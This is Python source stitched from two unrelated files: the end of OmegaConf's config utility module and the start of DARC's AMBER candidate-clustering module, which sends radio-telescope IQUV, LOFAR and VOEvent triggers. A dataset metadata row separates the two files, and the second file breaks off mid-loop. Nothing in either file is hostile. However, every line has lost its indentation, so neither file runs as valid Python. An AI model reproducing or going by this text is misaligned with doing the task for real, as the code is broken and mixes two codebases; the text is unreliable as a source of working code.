name = field.name
is_optional, type_ = _resolve_optional(resolved_hints[field.name])
type_ = _resolve_forward(type_, obj.__module__)
if hasattr(obj, name):
value = getattr(obj, name)
if value == dataclasses.MISSING:
value = MISSING
else:
if field.default_factory == dataclasses.MISSING: # type: ignore
value = MISSING
else:
value = field.default_factory() # type: ignore
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def is_dataclass(obj: Any) -> bool:
from omegaconf.base import Node
if dataclasses is None or isinstance(obj, Node):
return False
return dataclasses.is_dataclass(obj)
def is_attr_class(obj: Any) -> bool:
from omegaconf.base import Node
if attr is None or isinstance(obj, Node):
return False
return attr.has(obj)
def is_structured_config(obj: Any) -> bool:
return is_attr_class(obj) or is_dataclass(obj)
def is_dataclass_frozen(type_: Any) -> bool:
return type_.__dataclass_params__.frozen # type: ignore
def is_attr_frozen(type_: type) -> bool:
# This is very hacky and probably fragile as well.
# Unfortunately currently there isn't an official API in attr that can detect that.
# noinspection PyProtectedMember
return type_.__setattr__ == attr._make._frozen_setattrs # type: ignore
def get_type_of(class_or_object: Any) -> Type[Any]:
type_ = class_or_object
if not isinstance(type_, type):
type_ = type(class_or_object)
assert isinstance(type_, type)
return type_
def is_structured_config_frozen(obj: Any) -> bool:
type_ = get_type_of(obj)
if is_dataclass(type_):
return is_dataclass_frozen(type_)
if is_attr_class(type_):
return is_attr_frozen(type_)
return False
def get_structured_config_field_names(obj: Any) -> List[str]:
if is_dataclass(obj):
return get_dataclass_field_names(obj)
elif is_attr_class(obj):
return get_attr_class_field_names(obj)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
def get_structured_config_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
if is_dataclass(obj):
return get_dataclass_data(obj, allow_objects=allow_objects)
elif is_attr_class(obj):
return get_attr_data(obj, allow_objects=allow_objects)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
class ValueKind(Enum):
VALUE = 0
MANDATORY_MISSING = 1
INTERPOLATION = 2
def _is_missing_value(value: Any) -> bool:
from omegaconf import Node
if isinstance(value, Node):
value = value._value()
return _is_missing_literal(value)
def _is_missing_literal(value: Any) -> bool:
# Uses literal '???' instead of the MISSING const for performance reasons.
return isinstance(value, str) and value == "???"
def _is_none(
value: Any, resolve: bool = False, throw_on_resolution_failure: bool = True
) -> bool:
from omegaconf import Node
if not isinstance(value, Node):
return value is None
if resolve:
value = value._maybe_dereference_node(
throw_on_resolution_failure=throw_on_resolution_failure
)
if not throw_on_resolution_failure and value is None:
# Resolution failure: consider that it is *not* None.
return False
assert isinstance(value, Node)
return value._is_none()
def get_value_kind(
value: Any, strict_interpolation_validation: bool = False
) -> ValueKind:
"""
Determine the kind of a value
Examples:
VALUE: "10", "20", True
MANDATORY_MISSING: "???"
INTERPOLATION: "${foo.bar}", "${foo.${bar}}", "${foo:bar}", "[${foo}, ${bar}]",
"ftp://${host}/path", "${foo:${bar}, [true], {'baz': ${baz}}}"
:param value: Input to classify.
:param strict_interpolation_validation: If `True`, then when `value` is a string
containing "${", it is parsed to validate the interpolation syntax. If `False`,
this parsing step is skipped: this is more efficient, but will not detect errors.
"""
if _is_missing_value(value):
return ValueKind.MANDATORY_MISSING
value = _get_value(value)
# We identify potential interpolations by the presence of "${" in the string.
# Note that escaped interpolations (ex: "esc: \${bar}") are identified as
# interpolations: this is intended, since they must be processed as interpolations
# for the string to be properly un-escaped.
# Keep in mind that invalid interpolations will only be detected when
# `strict_interpolation_validation` is True.
if isinstance(value, str) and "${" in value:
if strict_interpolation_validation:
# First try the cheap regex matching that detects common interpolations.
if SIMPLE_INTERPOLATION_PATTERN.match(value) is None:
# If no match, do the more expensive grammar parsing to detect errors.
parse(value)
return ValueKind.INTERPOLATION
else:
return ValueKind.VALUE
# DEPRECATED: remove in 2.2
def is_bool(st: str) -> bool:
st = str.lower(st)
return st == "true" or st == "false"
def is_float(st: str) -> bool:
try:
float(st)
return True
except ValueError:
return False
def is_int(st: str) -> bool:
try:
int(st)
return True
except ValueError:
return False
# DEPRECATED: remove in 2.2
def decode_primitive(s: str) -> Any:
if is_bool(s):
return str.lower(s) == "true"
if is_int(s):
return int(s)
if is_float(s):
return float(s)
return s
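# Informal examples of decode_primitive's behavior (inputs chosen for illustration only):
#   decode_primitive("true") -> True
#   decode_primitive("3")    -> 3
#   decode_primitive("3.5")  -> 3.5
#   decode_primitive("foo")  -> "foo"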
def is_primitive_list(obj: Any) -> bool:
from .base import Container
return not isinstance(obj, Container) and isinstance(obj, (list, tuple))
def is_primitive_dict(obj: Any) -> bool:
t = get_type_of(obj)
return t is dict
def is_dict_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Dict or type_ is Dict # pragma: no cover
else: # pragma: no cover
# type_dict is a bit hard to detect.
# this support is tentative, if it eventually causes issues in other areas it may be dropped.
typed_dict = hasattr(type_, "__base__") and type_.__base__ == dict
return origin is dict or typed_dict
def is_list_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is List or type_ is List # pragma: no cover
else:
return origin is list # pragma: no cover
def is_tuple_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Tuple or type_ is Tuple # pragma: no cover
else:
return origin is tuple # pragma: no cover
def is_dict_subclass(type_: Any) -> bool:
return type_ is not None and isinstance(type_, type) and issubclass(type_, Dict)
def is_dict(obj: Any) -> bool:
return is_primitive_dict(obj) or is_dict_annotation(obj) or is_dict_subclass(obj)
def is_primitive_container(obj: Any) -> bool:
return is_primitive_list(obj) or is_primitive_dict(obj)
def get_list_element_type(ref_type: Optional[Type[Any]]) -> Any:
args = getattr(ref_type, "__args__", None)
if ref_type is not List and args is not None and args[0]:
element_type = args[0]
else:
element_type = Any
return element_type
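# Informal example: get_list_element_type(List[int]) yields int, while a bare List
# (or any type without __args__) falls back to Any.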
def get_dict_key_value_types(ref_type: Any) -> Tuple[Any, Any]:
args = getattr(ref_type, "__args__", None)
if args is None:
bases = getattr(ref_type, "__orig_bases__", None)
if bases is not None and len(bases) > 0:
args = getattr(bases[0], "__args__", None)
key_type: Any
element_type: Any
if ref_type is None or ref_type == Dict:
key_type = Any
element_type = Any
else:
if args is not None:
key_type = args[0]
element_type = args[1]
else:
key_type = Any
element_type = Any
return key_type, element_type
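# Informal example: get_dict_key_value_types(Dict[str, int]) yields (str, int); a bare
# Dict or None falls back to (Any, Any).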
def valid_value_annotation_type(type_: Any) -> bool:
return type_ is Any or is_primitive_type(type_) or is_structured_config(type_)
def _valid_dict_key_annotation_type(type_: Any) -> bool:
from omegaconf import DictKeyType
return type_ is None or type_ is Any or issubclass(type_, DictKeyType.__args__) # type: ignore
def is_primitive_type(type_: Any) -> bool:
type_ = get_type_of(type_)
return issubclass(type_, Enum) or type_ in (int, float, bool, str, type(None))
def _is_interpolation(v: Any, strict_interpolation_validation: bool = False) -> bool:
if isinstance(v, str):
ret = (
get_value_kind(v, strict_interpolation_validation)
== ValueKind.INTERPOLATION
)
assert isinstance(ret, bool)
return ret
return False
def _get_value(value: Any) -> Any:
from .base import Container
from .nodes import ValueNode
if isinstance(value, ValueNode):
return value._value()
elif isinstance(value, Container):
boxed = value._value()
if boxed is None or _is_missing_literal(boxed) or _is_interpolation(boxed):
return boxed
# return primitives and regular OmegaConf Containers as is
return value
def get_ref_type(obj: Any, key: Any = None) -> Optional[Type[Any]]:
from omegaconf import Container, Node
if isinstance(obj, Container):
if key is not None:
obj = obj._get_node(key)
else:
if key is not None:
raise ValueError("Key must only be provided when obj is a container")
if isinstance(obj, Node):
ref_type = obj._metadata.ref_type
if obj._is_optional() and ref_type is not Any:
return Optional[ref_type] # type: ignore
else:
return ref_type
else:
return Any # type: ignore
def _raise(ex: Exception, cause: Exception) -> None:
# Set the environment variable OC_CAUSE=1 to get a stacktrace that includes the
# causing exception.
env_var = os.environ["OC_CAUSE"] if "OC_CAUSE" in os.environ else None
debugging = sys.gettrace() is not None
full_backtrace = (debugging and not env_var == "0") or (env_var == "1")
if full_backtrace:
ex.__cause__ = cause
else:
ex.__cause__ = None
    raise ex.with_traceback(sys.exc_info()[2])  # set env OC_CAUSE=1 for full backtrace
def format_and_raise(
node: Any,
key: Any,
value: Any,
msg: str,
cause: Exception,
type_override: Any = None,
) -> None:
from omegaconf import OmegaConf
from omegaconf.base import Node
if isinstance(cause, AssertionError):
raise
if isinstance(cause, OmegaConfBaseException) and cause._initialized:
ex = cause
if type_override is not None:
ex = type_override(str(cause))
ex.__dict__ = copy.deepcopy(cause.__dict__)
_raise(ex, cause)
object_type: Optional[Type[Any]]
object_type_str: Optional[str] = None
ref_type: Optional[Type[Any]]
ref_type_str: Optional[str]
child_node: Optional[Node] = None
if node is None:
full_key = key if key is not None else ""
object_type = None
ref_type = None
ref_type_str = None
else:
if key is not None and not node._is_none():
child_node = node._get_node(key, validate_access=False)
try:
full_key = node._get_full_key(key=key)
except Exception as exc:
# Since we are handling an exception, raising a different one here would
# be misleading. Instead, we display it in the key.
full_key = f"<unresolvable due to {type(exc).__name__}: {exc}>"
object_type = OmegaConf.get_type(node)
object_type_str = type_str(object_type)
ref_type = get_ref_type(node)
ref_type_str = type_str(ref_type)
msg = string.Template(msg).safe_substitute(
REF_TYPE=ref_type_str,
OBJECT_TYPE=object_type_str,
KEY=key,
FULL_KEY=full_key,
VALUE=value,
VALUE_TYPE=type_str(type(value), include_module_name=True),
KEY_TYPE=f"{type(key).__name__}",
)
if ref_type not in (None, Any):
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
reference_type=$REF_TYPE
object_type=$OBJECT_TYPE"""
)
else:
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
object_type=$OBJECT_TYPE"""
)
s = string.Template(template=template)
message = s.substitute(
REF_TYPE=ref_type_str, OBJECT_TYPE=object_type_str, MSG=msg, FULL_KEY=full_key
)
exception_type = type(cause) if type_override is None else type_override
if exception_type == TypeError:
exception_type = ConfigTypeError
elif exception_type == IndexError:
exception_type = ConfigIndexError
ex = exception_type(f"{message}")
if issubclass(exception_type, OmegaConfBaseException):
ex._initialized = True
ex.msg = message
ex.parent_node = node
ex.child_node = child_node
ex.key = key
ex.full_key = full_key
ex.value = value
ex.object_type = object_type
ex.object_type_str = object_type_str
ex.ref_type = ref_type
ex.ref_type_str = ref_type_str
_raise(ex, cause)
def type_str(t: Any, include_module_name: bool = False) -> str:
is_optional, t = _resolve_optional(t)
if t is None:
return type(t).__name__
if t is Any:
return "Any"
if t is ...:
return "..."
if sys.version_info < (3, 7, 0): # pragma: no cover
# Python 3.6
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t.__origin__ is not None:
name = type_str(t.__origin__)
else:
name = str(t)
if name.startswith("typing."):
name = name[len("typing.") :]
else: # pragma: no cover
# Python >= 3.7
if hasattr(t, "__name__"):
name = str(t.__name__)
else:
if t._name is None:
if t.__origin__ is not None:
name = type_str(
t.__origin__, include_module_name=include_module_name
)
else:
name = str(t._name)
args = getattr(t, "__args__", None)
if args is not None:
args = ", ".join(
[type_str(t, include_module_name=include_module_name) for t in t.__args__]
)
ret = f"{name}[{args}]"
else:
ret = name
if include_module_name:
if (
hasattr(t, "__module__")
and t.__module__ != "builtins"
and t.__module__ != "typing"
and not t.__module__.startswith("omegaconf.")
):
module_prefix = t.__module__ + "."
else:
module_prefix = ""
ret = module_prefix + ret
if is_optional:
return f"Optional[{ret}]"
else:
return ret
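# Informal examples (derived from the logic above, not exhaustive):
#   type_str(int)           -> "int"
#   type_str(Any)           -> "Any"
#   type_str(Optional[int]) -> "Optional[int]"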
def _ensure_container(target: Any, flags: Optional[Dict[str, bool]] = None) -> Any:
from omegaconf import OmegaConf
if is_primitive_container(target):
assert isinstance(target, (list, dict))
target = OmegaConf.create(target, flags=flags)
elif is_structured_config(target):
target = OmegaConf.structured(target, flags=flags)
elif not OmegaConf.is_config(target):
raise ValueError(
"Invalid input. Supports one of "
+ "[dict,list,DictConfig,ListConfig,dataclass,dataclass instance,attr class,attr class instance]"
)
return target
def is_generic_list(type_: Any) -> bool:
"""
Checks if a type is a generic list, for example:
list returns False
typing.List returns False
typing.List[T] returns True
:param type_: variable type
:return: bool
"""
return is_list_annotation(type_) and get_list_element_type(type_) is not None
def is_generic_dict(type_: Any) -> bool:
"""
Checks if a type is a generic dict, for example:
list returns False
typing.List returns False
typing.List[T] returns True
:param type_: variable type
:return: bool
"""
return is_dict_annotation(type_) and len(get_dict_key_value_types(type_)) > 0
def is_container_annotation(type_: Any) -> bool:
return is_list_annotation(type_) or is_dict_annotation(type_)
def split_key(key: str) -> List[str]:
"""
Split a full key path into its individual components.
This is similar to `key.split(".")` but also works with the getitem syntax:
"a.b" -> ["a", "b"]
"a[b]" -> ["a, "b"]
".a.b[c].d" -> ["", "a", "b", "c", "d"]
"[a].b" -> ["a", "b"]
"""
# Obtain the first part of the key (in docstring examples: a, a, .a, '')
first = KEY_PATH_HEAD.match(key)
assert first is not None
first_stop = first.span()[1]
# `tokens` will contain all elements composing the key.
tokens = key[0:first_stop].split(".")
# Optimization in case `key` has no other component: we are done.
if first_stop == len(key):
return tokens
if key[first_stop] == "[" and not tokens[-1]:
# This is a special case where the first key starts with brackets, e.g.
# [a] or ..[a]. In that case there is an extra "" in `tokens` that we
# need to get rid of:
# [a] -> tokens = [""] but we would like []
# ..[a] -> tokens = ["", "", ""] but we would like ["", ""]
tokens.pop()
# Identify other key elements (in docstring examples: b, b, b/c/d, b)
others = KEY_PATH_OTHER.findall(key[first_stop:])
# There are two groups in the `KEY_PATH_OTHER` regex: one for keys starting
# with a dot (.b, .d) and one for keys starting with a bracket ([b], [c]).
# Only one group can be non-empty.
tokens += [dot_key if dot_key else bracket_key for dot_key, bracket_key in others]
return tokens
# Similar to Python 3.7+'s `contextlib.nullcontext` (which should be used instead,
# once support for Python 3.6 is dropped).
@contextmanager
def nullcontext(enter_result: Any = None) -> Iterator[Any]:
yield enter_result
| 2.328125 | 2 |
darc/amber_clustering.py | loostrum/darc | 0 | 3331 | <gh_stars>0
#!/usr/bin/env python3
#
# AMBER Clustering
import os
from time import sleep
import yaml
import ast
import threading
import multiprocessing as mp
import numpy as np
from astropy.time import Time, TimeDelta
import astropy.units as u
from astropy.coordinates import SkyCoord
from darc import DARCBase, VOEventQueueServer, LOFARTriggerQueueServer
from darc.definitions import TSAMP, NCHAN, BANDWIDTH, MASTER, TIME_UNIT
from darc.external import tools
from darc import util
class AMBERClusteringException(Exception):
pass
class AMBERClustering(DARCBase):
"""
Trigger IQUV / LOFAR / VOEvent system based on AMBER candidates
1. Cluster incoming triggers
2. Apply thresholds (separate for known and new sources, and for IQUV vs LOFAR)
3. Put IQUV triggers on output queue
4. Put LOFAR triggers on remote LOFAR trigger queue and on VOEvent queue
"""
def __init__(self, *args, connect_vo=True, connect_lofar=True, **kwargs):
"""
:param bool connect_vo: Whether or not to connect to VOEvent queue on master node
:param bool connect_lofar: Whether or not to connect to LOFAR trigger queue on master node
"""
super(AMBERClustering, self).__init__(*args, **kwargs)
self.connect_vo = connect_vo
self.connect_lofar = connect_lofar
self.dummy_queue = mp.Queue()
self.threads = {}
self.hdr_mapping = {}
self.obs_config = None
self.observation_running = False
self.amber_triggers = []
self.source_list = None
self.lock = mp.Lock()
# store when we are allowed to do IQUV / LOFAR triggering
self.time_iquv = Time.now()
# connect to VOEvent generator
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
else:
# dummy queue
self.logger.info("VO Generator connection disabled, setting dummy queue")
self.vo_queue = mp.Queue()
self.have_vo = False
# connect to LOFAR trigger
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
else:
# dummy queue
self.logger.info("LOFAR Trigger connection disabled, setting dummy queue")
self.lofar_queue = mp.Queue()
self.have_lofar = False
def _load_source_list(self):
"""
Load the list with known source DMs
:return: source list with dict per category
"""
try:
with open(self.source_file, 'r') as f:
source_list = yaml.load(f, Loader=yaml.SafeLoader)
except OSError as e:
raise AMBERClusteringException("Cannot load source list: {}".format(e))
return source_list
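    # Sketch of the expected source-list YAML layout, inferred from _get_source below
    # (the source names and DM values here are purely illustrative):
    #   aliases:
    #     B0531+21: CRAB
    #   pulsars:
    #     CRAB: 56.77
    #   frbs:
    #     FRB180916: 348.8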
def process_command(self, command):
"""
Process command received from queue
:param dict command: Command to process
"""
if command['command'] == 'trigger':
if not self.observation_running:
self.logger.error("Trigger(s) received but no observation is running - ignoring")
else:
with self.lock:
self.amber_triggers.append(command['trigger'])
elif command['command'] == 'get_attr':
self.get_attribute(command)
else:
self.logger.error("Unknown command received: {}".format(command['command']))
def start_observation(self, obs_config, reload=True):
"""
Parse obs config and start listening for amber triggers on queue
:param dict obs_config: Observation configuration
:param bool reload: reload service settings (default: True)
"""
# reload config
if reload:
self.load_config()
# clean any old triggers
self.amber_triggers = []
# parse parset
obs_config['parset'] = self._load_parset(obs_config)
# set config
self.obs_config = obs_config
self.observation_running = True
# (re)load source list in case of changes
self.source_list = self._load_source_list()
# try connecting to VO server if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_vo:
try:
self.vo_queue = self.voevent_connector()
self.logger.info("Connected to VOEvent Generator on master node")
self.have_vo = True
except Exception as e:
self.logger.error("Failed to connect to VOEvent Generator, setting dummy queue ({})".format(e))
self.vo_queue = self.dummy_queue
self.have_vo = False
        # try connecting to LOFAR trigger server if enabled
# always do this in case a connection was available before, but failed at some point
if self.connect_lofar:
try:
self.lofar_queue = self.lofar_connector()
self.logger.info("Connected to LOFAR Trigger on master node")
self.have_lofar = True
except Exception as e:
self.logger.error("Failed to connect to LOFAR Trigger, setting dummy queue ({})".format(e))
self.lofar_queue = self.dummy_queue
self.have_lofar = False
# process triggers in thread
self.threads['processing'] = threading.Thread(target=self._process_triggers)
self.threads['processing'].start()
self.logger.info("Observation started")
def stop_observation(self, *args, **kwargs):
"""
Stop observation
"""
# set running to false
self.observation_running = False
# clear triggers
self.amber_triggers = []
# clear header
self.hdr_mapping = {}
# clear config
self.obs_config = None
# clear threads
for key, thread in self.threads.items():
if thread is not None:
thread.join()
self.threads[key] = None
def voevent_connector(self):
"""
Connect to the VOEvent generator on the master node
"""
# Load VO server settings
VOEventQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['voevent_generator']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = VOEventQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def lofar_connector(self):
"""
Connect to the LOFAR triggering system on the master node
"""
# Load LOFAR trigger server settings
LOFARTriggerQueueServer.register('get_queue')
with open(self.config_file, 'r') as f:
server_config = yaml.load(f, Loader=yaml.SafeLoader)['lofar_trigger']
port = server_config['server_port']
key = server_config['server_auth'].encode()
server = LOFARTriggerQueueServer(address=(MASTER, port), authkey=key)
server.connect()
return server.get_queue()
def _get_source(self):
"""
Try to get DM for a known source
:return: DM for known source, else None
"""
# get source name from parset
try:
source = self.obs_config['parset']['task.source.name']
except KeyError:
self.logger.error("Cannot get source name from parset, will not do known-source triggering")
return None, None, None
# check if source is in source list
# first check aliases
try:
alias = self.source_list['aliases'][source]
except KeyError:
# not found
pass
else:
# replace source by alias so we can look it up in other lists
self.logger.info("Using alias {} for source {}".format(alias, source))
source = alias
# check if source is a known pulsar or frb
dm_src = None
src_type = None
for key in ['pulsars', 'frbs']:
try:
dm_src = self.source_list[key][source]
src_type = key[:-1]
except KeyError:
pass
else:
break
return dm_src, src_type, source
def _check_triggers(self, triggers, sys_params, utc_start, datetimesource, dm_min=0, dm_max=np.inf, dm_src=None,
width_max=np.inf, snr_min=8, src_type=None, src_name=None, dmgal=0, pointing=None,
skip_lofar=False):
"""
Cluster triggers and run IQUV and/or LOFAR triggering
:param list triggers: Raw triggers
:param dict sys_params: System parameters (dt, delta_nu_MHz, nu_GHz)
:param str utc_start: start time of observation, in format readable by astropy.time.Time
:param str datetimesource: Field name with date and time
:param float dm_min: minimum DM (default: 0)
:param float dm_max: maximum DM (default: inf)
:param float dm_src: DM of known source (default: None)
:param float width_max: maximum width (default: inf)
        :param float snr_min: minimum S/N (default: 8)
:param str src_type: Source type (pulsar, frb, None)
:param str src_name: Source name (default: None)
:param float dmgal: galactic maximum DM
:param astropy.coordinates.SkyCoord pointing: Pointing for LOFAR triggering (default: None)
:param bool skip_lofar: Skip LOFAR triggering (default: False)
"""
# cluster using IQUV thresholds
# LOFAR thresholds are assumed to be more strict for every parameter
cluster_snr, cluster_dm, cluster_time, cluster_downsamp, cluster_sb, _, ncand_per_cluster = \
tools.get_triggers(triggers,
dm_min=dm_min, dm_max=dm_max, sig_thresh=snr_min, t_window=self.clustering_window,
read_beam=True, return_clustcounts=True, sb_filter=self.sb_filter,
sb_filter_period_min=self.sb_filter_period_min,
sb_filter_period_max=self.sb_filter_period_max,
**sys_params)
# select on width
mask = np.array(cluster_downsamp) <= width_max
cluster_snr = np.array(cluster_snr)[mask]
cluster_dm = np.array(cluster_dm)[mask]
cluster_time = np.array(cluster_time)[mask]
cluster_downsamp = np.array(cluster_downsamp)[mask].astype(int)
cluster_sb = np.array(cluster_sb)[mask].astype(int)
ncand_per_cluster = np.array(ncand_per_cluster)[mask].astype(int)
ncluster = len(cluster_snr)
if src_type is not None:
known = 'known'
else:
known = 'new'
self.logger.info("Clustered {} raw triggers into {} IQUV trigger(s) "
"for {} source".format(len(triggers), ncluster, known))
# return if there are no clusters
if ncluster == 0:
return
# there are clusters, do IQUV triggering
# check if we can do triggering
now = Time.now()
if now < self.time_iquv:
self.logger.warning("Cannot trigger IQUV yet, next possible time: {}".format(self.time_iquv))
else:
self.logger.info("Sending IQUV trigger")
# update last trigger time
self.time_iquv = now + TimeDelta(self.thresh_iquv['interval'], format='sec')
# trigger IQUV
dada_triggers = []
for i in range(ncluster):
# send known source dm if available
if dm_src is not None:
dm_to_send = dm_src
else:
dm_to_send = cluster_dm[i]
dada_trigger = {'stokes': 'IQUV', 'dm': dm_to_send, 'beam': cluster_sb[i],
'width': cluster_downsamp[i], 'snr': cluster_snr[i],
'time': cluster_time[i], 'utc_start': utc_start}
dada_triggers.append(dada_trigger)
self.target_queue.put({'command': 'trigger', 'trigger': dada_triggers})
# skip LOFAR triggering for pulsars or if explicitly disabled
if src_type == 'pulsar' or skip_lofar:
return
# select LOFAR thresholds
if src_type is not None:
# known source, use same DM threshold as IQUV, but apply width and S/N thresholds
# DM_min effectively does nothing here because the value is the same as for IQUV
# but it needs to be defined for the mask = line below to work
# no limit on candidates per cluster
snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = dm_min
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = np.inf
# Overrides for specific sources
if src_name in self.lofar_trigger_sources:
# check CB number
try:
allowed_cbs = self.thresh_lofar_override['cb']
if isinstance(allowed_cbs, float):
allowed_cbs = [allowed_cbs]
if self.obs_config['beam'] not in allowed_cbs:
return
except KeyError:
# any CB is valid if cb key is not present
pass
else:
# source known, CB valid: set thresholds
snr_min_lofar = self.thresh_lofar_override['snr_min']
width_max_lofar = self.thresh_lofar_override['width_max']
self.logger.warning("Setting LOFAR trigger thresholds: S/N > {}, "
"downsamp <= {}".format(snr_min_lofar, width_max_lofar))
else:
# new source, apply all LOFAR thresholds
snr_min_lofar = self.thresh_lofar['snr_min']
dm_min_lofar = max(dmgal * self.thresh_lofar['dm_frac_min'], self.dm_min_global)
width_max_lofar = self.thresh_lofar['width_max']
max_cands_per_cluster = self.thresh_lofar['max_cands_per_cluster']
# create mask for given thresholds
# also remove triggers where number of raw candidates is too high (this indicates RFI)
mask = (cluster_snr >= snr_min_lofar) & (cluster_dm >= dm_min_lofar) & \
(cluster_downsamp <= width_max_lofar) & \
(ncand_per_cluster <= max_cands_per_cluster)
# check for any remaining triggers
if np.any(mask):
ncluster = np.sum(mask)
self.logger.info("Found {} possible LOFAR trigger(s)".format(ncluster))
# note: the server keeps track of when LOFAR triggers were sent
# and whether or not a new trigger can be sent
# check if there are multiple triggers
if ncluster > 1:
self.logger.info("Multiple triggers - selecting trigger with highest S/N")
# argmax also works if there is one trigger, so just run it always
ind = np.argmax(cluster_snr[mask])
# estimate flux density based on peak S/N and width
snr = cluster_snr[mask][ind]
width = TSAMP.to(u.ms) * cluster_downsamp[mask][ind]
# astropy units only knows mJy, but the VOEvent Generator expects Jy
flux = util.get_flux(snr, width).to(u.mJy).value / 1000.
# select known source DM if available
if dm_src is not None:
dm_to_send = dm_src
dm_err = 0.
else:
dm_to_send = cluster_dm[mask][ind]
# set DM uncertainty to DM delay across pulse width
# Apertif has roughly 1 DM unit = 1 ms delay across band
dm_err = width.to(u.ms).value
# calculate arrival time at reference frequency = central frequency
cent_freq = sys_params['nu_GHz'] * 1000.
max_freq = cent_freq + .5 * BANDWIDTH.to(u.MHz).value
dm_delay = 4.148808E3 * dm_to_send * (cent_freq**-2 - max_freq**-2)
utc_arr = (utc_start + TimeDelta(cluster_time[mask][ind] - dm_delay, format='sec')).isot
# set a source name
if src_type is not None:
name = src_type
else:
name = 'candidate'
# check whether or not pointing information is available
if pointing is None:
self.logger.error("No pointing information available - cannot trigger LOFAR")
# check if we are connected to the server
elif not self.have_lofar:
self.logger.error("No LOFAR Trigger connection available - cannot trigger LOFAR")
# do the trigger
else:
# create the full trigger and put on VO queue
lofar_trigger = {'dm': dm_to_send,
'dm_err': dm_err,
'width': width.to(u.ms).value, # ms
'snr': snr,
'flux': flux, # Jy
'ra': pointing.ra.deg, # decimal deg
'dec': pointing.dec.deg, # decimal deg
'cb': self.obs_config['beam'],
'sb': cluster_sb[mask][ind],
'ymw16': dmgal,
'semiMaj': 15, # arcmin, CB
'semiMin': 15, # arcmin, CB
'name': name,
'src_name': src_name,
'datetimesource': datetimesource,
'utc': utc_arr,
'tarr': cluster_time[mask][ind],
'importance': 0.1}
# add system parameters (dt, central freq (GHz), bandwidth (MHz))
lofar_trigger.update(sys_params)
self.logger.info("Sending LOFAR trigger to LOFAR Trigger system")
self.lofar_queue.put(lofar_trigger)
if self.have_vo:
self.logger.info("Sending same trigger to VOEvent system")
self.vo_queue.put(lofar_trigger)
else:
self.logger.error("No VOEvent Generator connection available - not sending VO trigger")
def _process_triggers(self):
"""
Read thresholds (DM, width, S/N) for clustering
Continuously read AMBER triggers from queue and start processing for known and/or new sources
"""
# set observation parameters
utc_start = Time(self.obs_config['startpacket'] / TIME_UNIT, format='unix')
datetimesource = self.obs_config['datetimesource']
dt = TSAMP.to(u.second).value
chan_width = (BANDWIDTH / float(NCHAN)).to(u.MHz).value
cent_freq = (self.obs_config['min_freq'] * u.MHz + 0.5 * BANDWIDTH).to(u.GHz).value
sys_params = {'dt': dt, 'delta_nu_MHz': chan_width, 'nu_GHz': cent_freq}
pointing = self._get_pointing()
dmgal = util.get_ymw16(self.obs_config['parset'], self.obs_config['beam'], self.logger)
# get known source dm and type
dm_src, src_type, src_name = self._get_source()
if src_type is not None:
thresh_src = {'dm_src': dm_src,
'src_type': src_type,
'src_name': src_name,
'dm_min': max(dm_src - self.dm_range, self.dm_min_global),
'dm_max': dm_src + self.dm_range,
'width_max': np.inf,
'snr_min': self.snr_min_global,
'pointing': pointing,
'dmgal': dmgal
}
self.logger.info("Setting {src_name} trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}".format(**thresh_src))
# set min and max DM for new sources with unknown DM
thresh_new = {'src_type': None,
'src_name': None,
'dm_min': max(dmgal * self.thresh_iquv['dm_frac_min'], self.dm_min_global),
'dm_max': np.inf,
'width_max': self.thresh_iquv['width_max'],
'snr_min': self.thresh_iquv['snr_min'],
'pointing': pointing,
'dmgal': dmgal
}
# if known source, check whether or not LOFAR triggering should be enabled for new sources
if src_type is not None and src_name in self.lofar_trigger_sources:
thresh_new['skip_lofar'] = not self.thresh_lofar['trigger_on_new_sources']
else:
thresh_new['skip_lofar'] = False
self.logger.info("Setting new source trigger DM range to {dm_min} - {dm_max}, "
"max downsamp={width_max}, min S/N={snr_min}, skip LOFAR "
"triggering={skip_lofar}".format(**thresh_new))
# main loop
while self.observation_running:
if self.amber_triggers:
# Copy the triggers so class-wide list can receive new triggers without those getting lost
with self.lock:
triggers = self.amber_triggers
self.amber_triggers = []
# check for header (always, because it is received once for every amber instance)
if not self.hdr_mapping:
for trigger in triggers:
if trigger.startswith('#'):
# read header, remove comment symbol
header = trigger.split()[1:]
self.logger.info("Received header: {}".format(header))
# Check if all required params are present and create mapping to col index
keys = ['beam_id', 'integration_step', 'time', 'DM', 'SNR']
for key in keys:
try:
self.hdr_mapping[key] = header.index(key)
except ValueError:
self.logger.error("Key missing from clusters header: {}".format(key))
